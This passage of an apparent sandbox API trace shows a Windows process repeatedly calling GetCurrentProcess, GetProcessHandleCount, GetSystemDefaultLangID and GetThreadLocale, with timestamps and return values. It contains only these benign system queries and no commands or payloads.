[0067.823] GetCurrentProcess () returned 0xffffffff [0067.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.823] GetSystemDefaultLangID () returned 0x25f0409 [0067.823] GetThreadLocale () returned 0x409 [0067.823] GetCurrentProcess () returned 0xffffffff [0067.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.823] GetSystemDefaultLangID () returned 0x25f0409 [0067.823] GetThreadLocale () returned 0x409 [0067.823] GetCurrentProcess () returned 0xffffffff [0067.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.824] GetSystemDefaultLangID () returned 0x25f0409 [0067.824] GetThreadLocale () returned 0x409 [0067.824] GetCurrentProcess () returned 0xffffffff [0067.824] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.824] GetSystemDefaultLangID () returned 0x25f0409 [0067.824] GetThreadLocale () returned 0x409 [0067.824] GetCurrentProcess () returned 0xffffffff [0067.824] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.824] GetSystemDefaultLangID () returned 0x25f0409 [0067.824] GetThreadLocale () returned 0x409 [0067.824] GetCurrentProcess () returned 0xffffffff [0067.824] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.824] GetSystemDefaultLangID () returned 0x25f0409 [0067.824] GetThreadLocale () returned 0x409 [0067.824] GetCurrentProcess () returned 0xffffffff [0067.824] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.824] GetSystemDefaultLangID () returned 0x25f0409 [0067.824] GetThreadLocale () returned 0x409 [0067.824] GetCurrentProcess () returned 0xffffffff [0067.824] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.824] GetSystemDefaultLangID () returned 0x25f0409 [0067.824] GetThreadLocale () returned 0x409 [0067.824] GetCurrentProcess () returned 0xffffffff [0067.824] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.824] GetSystemDefaultLangID () returned 0x25f0409 [0067.824] GetThreadLocale () returned 0x409 [0067.824] GetCurrentProcess () returned 0xffffffff [0067.825] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.825] GetSystemDefaultLangID () returned 0x25f0409 [0067.825] GetThreadLocale () returned 0x409 [0067.825] GetCurrentProcess () returned 0xffffffff [0067.825] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.825] GetSystemDefaultLangID () returned 0x25f0409 [0067.825] GetThreadLocale () returned 0x409 [0067.825] GetCurrentProcess () returned 0xffffffff [0067.825] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.825] GetSystemDefaultLangID () returned 0x25f0409 [0067.825] GetThreadLocale () returned 0x409 [0067.825] GetCurrentProcess () returned 0xffffffff [0067.825] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.825] GetSystemDefaultLangID () returned 0x25f0409 [0067.825] GetThreadLocale () returned 0x409 [0067.825] GetCurrentProcess () returned 0xffffffff [0067.825] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.825] GetSystemDefaultLangID () returned 0x25f0409 [0067.825] GetThreadLocale () returned 0x409 [0067.825] GetCurrentProcess () returned 0xffffffff [0067.825] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.825] GetSystemDefaultLangID () returned 0x25f0409 [0067.825] GetThreadLocale () returned 0x409 [0067.825] GetCurrentProcess () returned 0xffffffff [0067.825] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.825] GetSystemDefaultLangID () returned 0x25f0409 [0067.825] GetThreadLocale () returned 0x409 [0067.825] GetCurrentProcess () returned 0xffffffff [0067.826] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.826] GetSystemDefaultLangID () returned 0x25f0409 [0067.826] GetThreadLocale () returned 0x409 [0067.826] GetCurrentProcess () returned 0xffffffff [0067.826] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.826] GetSystemDefaultLangID () returned 0x25f0409 [0067.826] GetThreadLocale () returned 0x409 [0067.826] GetCurrentProcess () returned 0xffffffff [0067.826] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.826] GetSystemDefaultLangID () returned 0x25f0409 [0067.826] GetThreadLocale () returned 0x409 [0067.826] GetCurrentProcess () returned 0xffffffff [0067.826] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.826] GetSystemDefaultLangID () returned 0x25f0409 [0067.826] GetThreadLocale () returned 0x409 [0067.826] GetCurrentProcess () returned 0xffffffff [0067.826] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.826] GetSystemDefaultLangID () returned 0x25f0409 [0067.826] GetThreadLocale () returned 0x409 [0067.826] GetCurrentProcess () returned 0xffffffff [0067.826] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.826] GetSystemDefaultLangID () returned 0x25f0409 [0067.826] GetThreadLocale () returned 0x409 [0067.826] GetCurrentProcess () returned 0xffffffff [0067.826] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.826] GetSystemDefaultLangID () returned 0x25f0409 [0067.827] GetThreadLocale () returned 0x409 [0067.827] GetCurrentProcess () returned 0xffffffff [0067.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.827] GetSystemDefaultLangID () returned 0x25f0409 [0067.827] GetThreadLocale () returned 0x409 [0067.827] GetCurrentProcess () returned 0xffffffff [0067.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.827] GetSystemDefaultLangID () returned 0x25f0409 [0067.827] GetThreadLocale () returned 0x409 [0067.827] GetCurrentProcess () returned 0xffffffff [0067.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.827] GetSystemDefaultLangID () returned 0x25f0409 [0067.827] GetThreadLocale () returned 0x409 [0067.827] GetCurrentProcess () returned 0xffffffff [0067.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.827] GetSystemDefaultLangID () returned 0x25f0409 [0067.827] GetThreadLocale () returned 0x409 [0067.827] GetCurrentProcess () returned 0xffffffff [0067.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.827] GetSystemDefaultLangID () returned 0x25f0409 [0067.827] GetThreadLocale () returned 0x409 [0067.827] GetCurrentProcess () returned 0xffffffff [0067.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.827] GetSystemDefaultLangID () returned 0x25f0409 [0067.827] GetThreadLocale () returned 0x409 [0067.827] GetCurrentProcess () returned 0xffffffff [0067.827] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.828] GetSystemDefaultLangID () returned 0x25f0409 [0067.828] GetThreadLocale () returned 0x409 [0067.828] GetCurrentProcess () returned 0xffffffff [0067.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.828] GetSystemDefaultLangID () returned 0x25f0409 [0067.828] GetThreadLocale () returned 0x409 [0067.828] GetCurrentProcess () returned 0xffffffff [0067.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.828] GetSystemDefaultLangID () returned 0x25f0409 [0067.828] GetThreadLocale () returned 0x409 [0067.828] GetCurrentProcess () returned 0xffffffff [0067.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.828] GetSystemDefaultLangID () returned 0x25f0409 [0067.828] GetThreadLocale () returned 0x409 [0067.828] GetCurrentProcess () returned 0xffffffff [0067.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.828] GetSystemDefaultLangID () returned 0x25f0409 [0067.828] GetThreadLocale () returned 0x409 [0067.828] GetCurrentProcess () returned 0xffffffff [0067.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.828] GetSystemDefaultLangID () returned 0x25f0409 [0067.828] GetThreadLocale () returned 0x409 [0067.828] GetCurrentProcess () returned 0xffffffff [0067.828] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.828] GetSystemDefaultLangID () returned 0x25f0409 [0067.828] GetThreadLocale () returned 0x409 [0067.828] GetCurrentProcess () returned 0xffffffff [0067.829] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.829] GetSystemDefaultLangID () returned 0x25f0409 [0067.829] GetThreadLocale () returned 0x409 [0067.829] GetCurrentProcess () returned 0xffffffff [0067.829] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.829] GetSystemDefaultLangID () returned 0x25f0409 [0067.829] GetThreadLocale () returned 0x409 [0067.829] GetCurrentProcess () returned 0xffffffff [0067.829] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.829] GetSystemDefaultLangID () returned 0x25f0409 [0067.829] GetThreadLocale () returned 0x409 [0067.829] GetCurrentProcess () returned 0xffffffff [0067.829] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.829] GetSystemDefaultLangID () returned 0x25f0409 [0067.829] GetThreadLocale () returned 0x409 [0067.832] GetCurrentProcess () returned 0xffffffff [0067.832] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.832] GetSystemDefaultLangID () returned 0x25f0409 [0067.832] GetThreadLocale () returned 0x409 [0067.832] GetCurrentProcess () returned 0xffffffff [0067.832] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.832] GetSystemDefaultLangID () returned 0x25f0409 [0067.832] GetThreadLocale () returned 0x409 [0067.832] GetCurrentProcess () returned 0xffffffff [0067.832] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.832] GetSystemDefaultLangID () returned 0x25f0409 [0067.832] GetThreadLocale () returned 0x409 [0067.832] GetCurrentProcess () returned 0xffffffff [0067.832] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.832] GetSystemDefaultLangID () returned 0x25f0409 [0067.833] GetThreadLocale () returned 0x409 [0067.833] GetCurrentProcess () returned 0xffffffff [0067.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.833] GetSystemDefaultLangID () returned 0x25f0409 [0067.833] GetThreadLocale () returned 0x409 [0067.833] GetCurrentProcess () returned 0xffffffff [0067.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.833] GetSystemDefaultLangID () returned 0x25f0409 [0067.833] GetThreadLocale () returned 0x409 [0067.833] GetCurrentProcess () returned 0xffffffff [0067.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.833] GetSystemDefaultLangID () returned 0x25f0409 [0067.833] GetThreadLocale () returned 0x409 [0067.833] GetCurrentProcess () returned 0xffffffff [0067.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.833] GetSystemDefaultLangID () returned 0x25f0409 [0067.833] GetThreadLocale () returned 0x409 [0067.833] GetCurrentProcess () returned 0xffffffff [0067.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.833] GetSystemDefaultLangID () returned 0x25f0409 [0067.833] GetThreadLocale () returned 0x409 [0067.833] GetCurrentProcess () returned 0xffffffff [0067.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.833] GetSystemDefaultLangID () returned 0x25f0409 [0067.833] GetThreadLocale () returned 0x409 [0067.833] GetCurrentProcess () returned 0xffffffff [0067.833] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.834] GetSystemDefaultLangID () returned 0x25f0409 [0067.834] GetThreadLocale () returned 0x409 [0067.834] GetCurrentProcess () returned 0xffffffff [0067.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.834] GetSystemDefaultLangID () returned 0x25f0409 [0067.834] GetThreadLocale () returned 0x409 [0067.834] GetCurrentProcess () returned 0xffffffff [0067.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.834] GetSystemDefaultLangID () returned 0x25f0409 [0067.834] GetThreadLocale () returned 0x409 [0067.834] GetCurrentProcess () returned 0xffffffff [0067.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.834] GetSystemDefaultLangID () returned 0x25f0409 [0067.834] GetThreadLocale () returned 0x409 [0067.834] GetCurrentProcess () returned 0xffffffff [0067.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.834] GetSystemDefaultLangID () returned 0x25f0409 [0067.834] GetThreadLocale () returned 0x409 [0067.834] GetCurrentProcess () returned 0xffffffff [0067.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.834] GetSystemDefaultLangID () returned 0x25f0409 [0067.834] GetThreadLocale () returned 0x409 [0067.834] GetCurrentProcess () returned 0xffffffff [0067.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.834] GetSystemDefaultLangID () returned 0x25f0409 [0067.834] GetThreadLocale () returned 0x409 [0067.834] GetCurrentProcess () returned 0xffffffff [0067.834] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.835] GetSystemDefaultLangID () returned 0x25f0409 [0067.835] GetThreadLocale () returned 0x409 [0067.835] GetCurrentProcess () returned 0xffffffff [0067.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.835] GetSystemDefaultLangID () returned 0x25f0409 [0067.835] GetThreadLocale () returned 0x409 [0067.835] GetCurrentProcess () returned 0xffffffff [0067.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.835] GetSystemDefaultLangID () returned 0x25f0409 [0067.835] GetThreadLocale () returned 0x409 [0067.835] GetCurrentProcess () returned 0xffffffff [0067.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.835] GetSystemDefaultLangID () returned 0x25f0409 [0067.835] GetThreadLocale () returned 0x409 [0067.835] GetCurrentProcess () returned 0xffffffff [0067.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.835] GetSystemDefaultLangID () returned 0x25f0409 [0067.835] GetThreadLocale () returned 0x409 [0067.835] GetCurrentProcess () returned 0xffffffff [0067.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.835] GetSystemDefaultLangID () returned 0x25f0409 [0067.835] GetThreadLocale () returned 0x409 [0067.835] GetCurrentProcess () returned 0xffffffff [0067.835] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.835] GetSystemDefaultLangID () returned 0x25f0409 [0067.835] GetThreadLocale () returned 0x409 [0067.835] GetCurrentProcess () returned 0xffffffff [0067.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.836] GetSystemDefaultLangID () returned 0x25f0409 [0067.836] GetThreadLocale () returned 0x409 [0067.836] GetCurrentProcess () returned 0xffffffff [0067.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.836] GetSystemDefaultLangID () returned 0x25f0409 [0067.836] GetThreadLocale () returned 0x409 [0067.836] GetCurrentProcess () returned 0xffffffff [0067.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.836] GetSystemDefaultLangID () returned 0x25f0409 [0067.836] GetThreadLocale () returned 0x409 [0067.836] GetCurrentProcess () returned 0xffffffff [0067.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.836] GetSystemDefaultLangID () returned 0x25f0409 [0067.836] GetThreadLocale () returned 0x409 [0067.836] GetCurrentProcess () returned 0xffffffff [0067.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.836] GetSystemDefaultLangID () returned 0x25f0409 [0067.836] GetThreadLocale () returned 0x409 [0067.836] GetCurrentProcess () returned 0xffffffff [0067.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.836] GetSystemDefaultLangID () returned 0x25f0409 [0067.836] GetThreadLocale () returned 0x409 [0067.836] GetCurrentProcess () returned 0xffffffff [0067.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.836] GetSystemDefaultLangID () returned 0x25f0409 [0067.836] GetThreadLocale () returned 0x409 [0067.837] GetCurrentProcess () returned 0xffffffff [0067.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.837] GetSystemDefaultLangID () returned 0x25f0409 [0067.837] GetThreadLocale () returned 0x409 [0067.837] GetCurrentProcess () returned 0xffffffff [0067.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.837] GetSystemDefaultLangID () returned 0x25f0409 [0067.837] GetThreadLocale () returned 0x409 [0067.837] GetCurrentProcess () returned 0xffffffff [0067.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.837] GetSystemDefaultLangID () returned 0x25f0409 [0067.837] GetThreadLocale () returned 0x409 [0067.837] GetCurrentProcess () returned 0xffffffff [0067.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.837] GetSystemDefaultLangID () returned 0x25f0409 [0067.837] GetThreadLocale () returned 0x409 [0067.837] GetCurrentProcess () returned 0xffffffff [0067.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.837] GetSystemDefaultLangID () returned 0x25f0409 [0067.837] GetThreadLocale () returned 0x409 [0067.837] GetCurrentProcess () returned 0xffffffff [0067.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.837] GetSystemDefaultLangID () returned 0x25f0409 [0067.837] GetThreadLocale () returned 0x409 [0067.837] GetCurrentProcess () returned 0xffffffff [0067.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.838] GetSystemDefaultLangID () returned 0x25f0409 [0067.838] GetThreadLocale () returned 0x409 [0067.838] GetCurrentProcess () returned 0xffffffff [0067.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.838] GetSystemDefaultLangID () returned 0x25f0409 [0067.838] GetThreadLocale () returned 0x409 [0067.838] GetCurrentProcess () returned 0xffffffff [0067.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.838] GetSystemDefaultLangID () returned 0x25f0409 [0067.838] GetThreadLocale () returned 0x409 [0067.838] GetCurrentProcess () returned 0xffffffff [0067.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.838] GetSystemDefaultLangID () returned 0x25f0409 [0067.838] GetThreadLocale () returned 0x409 [0067.838] GetCurrentProcess () returned 0xffffffff [0067.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.838] GetSystemDefaultLangID () returned 0x25f0409 [0067.838] GetThreadLocale () returned 0x409 [0067.838] GetCurrentProcess () returned 0xffffffff [0067.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.838] GetSystemDefaultLangID () returned 0x25f0409 [0067.838] GetThreadLocale () returned 0x409 [0067.838] GetCurrentProcess () returned 0xffffffff [0067.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.838] GetSystemDefaultLangID () returned 0x25f0409 [0067.838] GetThreadLocale () returned 0x409 [0067.838] GetCurrentProcess () returned 0xffffffff [0067.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.839] GetSystemDefaultLangID () returned 0x25f0409 [0067.839] GetThreadLocale () returned 0x409 [0067.839] GetCurrentProcess () returned 0xffffffff [0067.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.839] GetSystemDefaultLangID () returned 0x25f0409 [0067.839] GetThreadLocale () returned 0x409 [0067.839] GetCurrentProcess () returned 0xffffffff [0067.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.839] GetSystemDefaultLangID () returned 0x25f0409 [0067.839] GetThreadLocale () returned 0x409 [0067.839] GetCurrentProcess () returned 0xffffffff [0067.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.839] GetSystemDefaultLangID () returned 0x25f0409 [0067.839] GetThreadLocale () returned 0x409 [0067.839] GetCurrentProcess () returned 0xffffffff [0067.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.839] GetSystemDefaultLangID () returned 0x25f0409 [0067.839] GetThreadLocale () returned 0x409 [0067.839] GetCurrentProcess () returned 0xffffffff [0067.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.839] GetSystemDefaultLangID () returned 0x25f0409 [0067.839] GetThreadLocale () returned 0x409 [0067.839] GetCurrentProcess () returned 0xffffffff [0067.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.839] GetSystemDefaultLangID () returned 0x25f0409 [0067.839] GetThreadLocale () returned 0x409 [0067.839] GetCurrentProcess () returned 0xffffffff [0067.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.840] GetSystemDefaultLangID () returned 0x25f0409 [0067.840] GetThreadLocale () returned 0x409 [0067.840] GetCurrentProcess () returned 0xffffffff [0067.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.840] GetSystemDefaultLangID () returned 0x25f0409 [0067.840] GetThreadLocale () returned 0x409 [0067.840] GetCurrentProcess () returned 0xffffffff [0067.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.840] GetSystemDefaultLangID () returned 0x25f0409 [0067.840] GetThreadLocale () returned 0x409 [0067.840] GetCurrentProcess () returned 0xffffffff [0067.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.840] GetSystemDefaultLangID () returned 0x25f0409 [0067.840] GetThreadLocale () returned 0x409 [0067.840] GetCurrentProcess () returned 0xffffffff [0067.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.840] GetSystemDefaultLangID () returned 0x25f0409 [0067.840] GetThreadLocale () returned 0x409 [0067.840] GetCurrentProcess () returned 0xffffffff [0067.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.840] GetSystemDefaultLangID () returned 0x25f0409 [0067.840] GetThreadLocale () returned 0x409 [0067.840] GetCurrentProcess () returned 0xffffffff [0067.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.840] GetSystemDefaultLangID () returned 0x25f0409 [0067.840] GetThreadLocale () returned 0x409 [0067.841] GetCurrentProcess () returned 0xffffffff [0067.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.841] GetSystemDefaultLangID () returned 0x25f0409 [0067.841] GetThreadLocale () returned 0x409 [0067.841] GetCurrentProcess () returned 0xffffffff [0067.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.841] GetSystemDefaultLangID () returned 0x25f0409 [0067.841] GetThreadLocale () returned 0x409 [0067.841] GetCurrentProcess () returned 0xffffffff [0067.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.841] GetSystemDefaultLangID () returned 0x25f0409 [0067.841] GetThreadLocale () returned 0x409 [0067.841] GetCurrentProcess () returned 0xffffffff [0067.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.841] GetSystemDefaultLangID () returned 0x25f0409 [0067.841] GetThreadLocale () returned 0x409 [0067.841] GetCurrentProcess () returned 0xffffffff [0067.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.841] GetSystemDefaultLangID () returned 0x25f0409 [0067.841] GetThreadLocale () returned 0x409 [0067.841] GetCurrentProcess () returned 0xffffffff [0067.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.841] GetSystemDefaultLangID () returned 0x25f0409 [0067.841] GetThreadLocale () returned 0x409 [0067.841] GetCurrentProcess () returned 0xffffffff [0067.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.841] GetSystemDefaultLangID () returned 0x25f0409 [0067.842] GetThreadLocale () returned 0x409 [0067.842] GetCurrentProcess () returned 0xffffffff [0067.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.842] GetSystemDefaultLangID () returned 0x25f0409 [0067.842] GetThreadLocale () returned 0x409 [0067.842] GetCurrentProcess () returned 0xffffffff [0067.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.842] GetSystemDefaultLangID () returned 0x25f0409 [0067.842] GetThreadLocale () returned 0x409 [0067.842] GetCurrentProcess () returned 0xffffffff [0067.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.842] GetSystemDefaultLangID () returned 0x25f0409 [0067.842] GetThreadLocale () returned 0x409 [0067.842] GetCurrentProcess () returned 0xffffffff [0067.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.842] 